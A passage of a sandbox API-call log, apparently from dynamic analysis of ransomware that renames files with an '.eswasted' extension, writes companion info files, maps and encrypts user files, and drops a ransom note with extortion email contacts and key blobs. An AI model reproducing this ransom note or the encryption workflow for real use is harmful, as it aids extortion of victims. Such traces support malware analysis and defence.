lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.651] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ea260 | out: hHeap=0x4a0000) returned 1 [0083.651] lstrcpyW (in: lpString1=0x4ea04a, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0083.651] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\default\\searches\\indexed locations.search-ms"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Searches\\Indexed Locations.search-ms.eswasted" (normalized: "c:\\users\\default\\searches\\indexed locations.search-ms.eswasted")) returned 1 [0083.651] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Indexed Locations.search-ms.eswasted" (normalized: "c:\\users\\default\\searches\\indexed locations.search-ms.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.652] GetLastError () returned 0x5 [0083.652] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Indexed Locations.search-ms.eswasted" (normalized: "c:\\users\\default\\searches\\indexed locations.search-ms.eswasted")) returned 0x23 [0083.652] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Indexed Locations.search-ms.eswasted", dwFileAttributes=0x22) returned 1 [0083.652] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Indexed Locations.search-ms.eswasted" (normalized: "c:\\users\\default\\searches\\indexed locations.search-ms.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0083.652] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0083.652] GetFileSize (in: hFile=0x120, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0xf8 [0083.652] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xf8) returned 0x2d0000 [0083.652] CloseHandle (hObject=0x120) returned 1 [0083.653] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0083.653] CloseHandle (hObject=0x110) returned 1 [0083.653] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Indexed Locations.search-ms.eswasted", dwFileAttributes=0x23) returned 1 [0083.653] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4ea260 [0083.653] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0083.654] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4ea2a8 | out: pbBuffer=0x4ea2a8) returned 1 [0083.654] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.654] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0083.654] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0083.654] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.662] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4ea468 [0083.663] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ea260 | out: hHeap=0x4a0000) returned 1 [0083.663] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e09f0 [0083.663] _snwprintf (in: _Dest=0x4e09f0, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]t6WSJB9RyPfpL1/rNcAUjIP2GMB7eZh69p2LNWT4g20fSDmK+WjVugdYeX5CvE6t\r\nE8GcpVrv1oV5780LJeOzE8ujFbJZpzc8B6RRRkLJIiIU/edmuviLcHSjbGxwK48S\r\n6CEaQ88FfuhF8Zt2sve70zgPmrLh4RNtNj7QUmz9a3NnSNJfvXeabNg7iFbKsH8U\r\nV4dI82DbeG3XnGXplK2xTEa59JkpUJEAhyFrodNb6lGXOBe9AA9yVjXRb/PcCB4g\r\noYKauHOkskW3lj7Rw72+woEdrIaDWD5jdoUvvfw/PtVrwgWPp1YlARKuoV4mhQUZ\r\nWqyd5Zq6G9Tlb/sLUzPBZPDSRrnKYXxxTw5iLO9FTbEM5R25emmzJlZQ8jIoQAhc\r\n5ELHcklrS/EqAZ8+ihpN/P+ZzKf00ZJnu1EgzmjYz93K7KGkBg9azGq847u4v/mT\r\nspRX1EdoACoe3a7OTmQ3T2U5kR32BpR3mHVRbUGuhR94+L/eWn32aHPsBUWRAi35\r\nir6YDBI4KeXDZgsvGb5zj0g+RKpcNXJV87XWNOAaXPcNONJqdO2TOlwczNOmBY8H\r\nfhIh1koGFt6xrxmTXP5eSb3wL8kfQaStOy3NlnAXJUKHJTZMOzE+VW6k+Q+kgDLh\r\n+rL4iBaNXA1pqYKDHJscEwmGVjcPcY93rVdgecdvFYR=[end_key]\r\nKEEP IT\r\n") returned 990 [0083.663] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ea468 | out: hHeap=0x4a0000) returned 1 [0083.663] WriteFile (in: hFile=0x118, lpBuffer=0x4e09f0*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x121fef8, lpOverlapped=0x0 | out: lpBuffer=0x4e09f0*, lpNumberOfBytesWritten=0x121fef8*=0x7bc, lpOverlapped=0x0) returned 1 [0083.663] SetEndOfFile (hFile=0x118) returned 1 [0083.665] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e09f0 | out: hHeap=0x4a0000) returned 1 [0083.665] CloseHandle (hObject=0x118) returned 1 [0083.665] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0083.665] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f4d18 | out: hHeap=0x4a0000) returned 1 [0083.665] _aulldvrm () returned 0x0 [0083.665] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0083.666] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0083.666] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.666] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms") returned 51 [0083.666] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x270) returned 0x4e9fd8 [0083.666] lstrcpyW (in: lpString1=0x4ea03e, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0083.666] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ea250 [0083.666] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0083.667] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ea250 | out: pbBuffer=0x4ea250) returned 1 [0083.667] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.667] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms.eswasted_info" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0083.669] WriteFile (in: hFile=0x118, lpBuffer=0x4ea250*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ea250*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0083.670] SetEndOfFile (hFile=0x118) returned 1 [0083.670] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.670] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ea250 | out: hHeap=0x4a0000) returned 1 [0083.670] lstrcpyW (in: lpString1=0x4ea03e, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0083.670] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms.eswasted" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms.eswasted")) returned 1 [0083.671] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms.eswasted" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0083.671] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x120 [0083.671] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x36c [0083.671] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x36c) returned 0x2d0000 [0083.671] CloseHandle (hObject=0x110) returned 1 [0083.672] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0083.672] CloseHandle (hObject=0x120) returned 1 [0083.672] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4ea250 [0083.672] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0083.673] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4ea298 | out: pbBuffer=0x4ea298) returned 1 [0083.673] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.673] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0083.674] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0083.674] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.682] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4ea458 [0083.682] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ea250 | out: hHeap=0x4a0000) returned 1 [0083.682] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e09f0 [0083.682] _snwprintf (in: _Dest=0x4e09f0, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]BzNTJhT79cuXs5cyEXxJcrv6UOOBXArk4uzZ2EX5yrvgpbPVwByh5NE6XNxKzFJf\r\nZB1fYwX4enLybYJZmkkzR93p/eqPby5lR2Se3spYxpx5H5dvv1ptrQW86/1fazcC\r\nodaKKG8ECXWMAG9VLpgrfoizL0ihxS6cvX1mclOh2Xi5hOXLmyBxMZwkCk398Q2g\r\nRuRjmrLHM1n/tAur8h1S88p8lVWxkaQCDR8fHvDtsrbkea6cruh0kGAbKgMuGE3q\r\nT9FsQm28VIpxrmhlfnP79hhHsyde57+Agc1TKnfncHUR6DYLIGh+ta0zIqhJpRPM\r\nfRb4Pkd+Jo4BJoeIazNoM28BGsr5ZJ7LQp6F2wnzQ7diBZjb9N/T/KQuU9LqzGsv\r\njOOBwJVpNaLnNdUgp6mhZBw01c80aWqCvz4C1qFgNsgVyZq+d3DjnQacQ2aYZ6Af\r\nuXxm6Dq9hIvOyoHW3EPOTnczHG7fAFc/RFXtXBvFDzjjTD+/jN0iKrYs3jwTZ+nG\r\npitBEzTaEQ+S55RcTbTeO1Kx7z4lbuk1i1q0EvzhvsqY/53b/iQJ5vKixADUlNBh\r\ncQYYwcstUFEznwXVfzY3CSCBK/3UOVBDWXvmcNwyE2ewop9gX9zAkYUy/PDxSLab\r\nwCFV8nTEYxWrgwRU+zTOodrSo2NvyMlAkCfzor137Pp=[end_key]\r\nKEEP IT\r\n") returned 990 [0083.682] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ea458 | out: hHeap=0x4a0000) returned 1 [0083.682] WriteFile (in: hFile=0x118, lpBuffer=0x4e09f0*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x121fef8, lpOverlapped=0x0 | out: lpBuffer=0x4e09f0*, lpNumberOfBytesWritten=0x121fef8*=0x7bc, lpOverlapped=0x0) returned 1 [0083.692] SetEndOfFile (hFile=0x118) returned 1 [0083.694] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e09f0 | out: hHeap=0x4a0000) returned 1 [0083.694] CloseHandle (hObject=0x118) returned 1 [0083.694] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0083.694] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x502548 | out: hHeap=0x4a0000) returned 1 [0083.695] _aulldvrm () returned 0x0 [0083.695] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0083.696] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0083.696] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.696] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3") returned 50 [0083.696] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x26e) returned 0x4e9fd8 [0083.696] lstrcpyW (in: lpString1=0x4ea03c, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0083.696] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ea250 [0083.696] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0083.697] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ea250 | out: pbBuffer=0x4ea250) returned 1 [0083.697] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.697] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3.eswasted_info" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0083.698] WriteFile (in: hFile=0x118, lpBuffer=0x4ea250*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ea250*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0083.699] SetEndOfFile (hFile=0x118) returned 1 [0083.699] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.699] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ea250 | out: hHeap=0x4a0000) returned 1 [0083.699] lstrcpyW (in: lpString1=0x4ea03c, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0083.699] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3.eswasted" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3.eswasted")) returned 1 [0083.701] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3.eswasted" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0083.702] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0083.702] GetFileSize (in: hFile=0x120, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x8064f1 [0083.702] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8064f1) returned 0x1320000 [0083.702] CloseHandle (hObject=0x120) returned 1 [0084.609] UnmapViewOfFile (lpBaseAddress=0x1320000) returned 1 [0084.703] CloseHandle (hObject=0x110) returned 1 [0084.707] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4ea250 [0084.713] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0084.742] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4ea298 | out: pbBuffer=0x4ea298) returned 1 [0084.742] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0084.743] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0084.743] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0084.743] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0084.753] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4ea458 [0084.754] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ea250 | out: hHeap=0x4a0000) returned 1 [0084.754] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ebff0 [0084.754] _snwprintf (in: _Dest=0x4ebff0, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]e4pb30qUYgSP0KqvxmRtpF68JHCMwdDbaoK3eeOUeyaqdt6FKqe4KSjjy3N2YLiM\r\nHYLC3pEXb9ht+y0il0QYm8BHjPoMetr3zzuPN4SX4H+GapRqQoAc+t6HI4ijEcwY\r\npyIKvKBl2vhuUUDsEmmWrsW8kW8TOn2VkkP1A2zQ/0nKub+MSHzRapzLUkQhgTKw\r\nP2qeEW8OJZWDRVDnKHgARS30nkfofxJozUxc3ByFBrPuue8yTphta2n3Yew6B/Ul\r\nr7G/nxiuueJfQXFGv8DSs/YuWujHC1ofBRpKLer+fOf6XYoQxUIPlW3x8uDAV/BE\r\nJJtcg/SHy/WvPJZFrEyfjPm1ih0NdKY87v/77pAPF2jkbtaFGhnLrk9alSpzVeLM\r\nExrWWc4urHhrEnI0eXNfnkqvbKefQ300Lz+xgzZEPoiBwlNB57YM7RITyxI8rc6M\r\nCFWkP9FY1tM7GFTYugDbml8Vjzw4yPKmIBdRvEOBSF98GaVrWFWVrYzNMpN1aj7y\r\nXSIHTMWCoC3eQyesF4W+twmY4vTRj3hMvRlKMrUlBpOxm/8TVeRnNEGuLEvV4h5y\r\nsLggsVK/0zHBlsYj7OvqRPdqXNAs1tH6R6Gx4NXves41aLiVEkPCKdbGg9GyYQXW\r\nYHx5/AgM/KI3irSBV85JglwOMeo2TJmhL+Pc8ZMHOmI=[end_key]\r\nKEEP IT\r\n") returned 990 [0084.754] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ea458 | out: hHeap=0x4a0000) returned 1 [0084.754] WriteFile (in: hFile=0x118, lpBuffer=0x4ebff0*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x121fef8, lpOverlapped=0x0 | out: lpBuffer=0x4ebff0*, lpNumberOfBytesWritten=0x121fef8*=0x7bc, lpOverlapped=0x0) returned 1 [0084.754] SetEndOfFile (hFile=0x118) returned 1 [0084.756] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ebff0 | out: hHeap=0x4a0000) returned 1 [0084.756] CloseHandle (hObject=0x118) returned 1 [0084.756] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0084.756] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x502608 | out: hHeap=0x4a0000) returned 1 [0084.756] _aulldvrm () returned 0x0 [0084.756] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0084.757] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0084.757] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0084.757] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg") returned 62 [0084.757] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x286) returned 0x4e9fd8 [0084.757] lstrcpyW (in: lpString1=0x4ea054, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0084.757] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ea268 [0084.757] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0084.758] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ea268 | out: pbBuffer=0x4ea268) returned 1 [0084.758] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0084.758] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg.eswasted_info" (normalized: "c:\\users\\public\\pictures\\sample pictures\\chrysanthemum.jpg.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0084.759] WriteFile (in: hFile=0x118, lpBuffer=0x4ea268*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ea268*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0084.760] SetEndOfFile (hFile=0x118) returned 1 [0084.761] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0084.761] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ea268 | out: hHeap=0x4a0000) returned 1 [0084.761] lstrcpyW (in: lpString1=0x4ea054, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0084.761] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\chrysanthemum.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg.eswasted" (normalized: "c:\\users\\public\\pictures\\sample pictures\\chrysanthemum.jpg.eswasted")) returned 1 [0084.780] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg.eswasted" (normalized: "c:\\users\\public\\pictures\\sample pictures\\chrysanthemum.jpg.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0084.780] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x120 [0084.780] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0xd6b22 [0084.780] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd6b22) returned 0x1220000 [0084.780] CloseHandle (hObject=0x110) returned 1 [0084.928] UnmapViewOfFile (lpBaseAddress=0x1220000) returned 1 [0084.936] CloseHandle (hObject=0x120) returned 1 [0084.936] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4ea268 [0084.936] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0084.937] CryptGenRandom (in: hProv=0x4e5ff0, 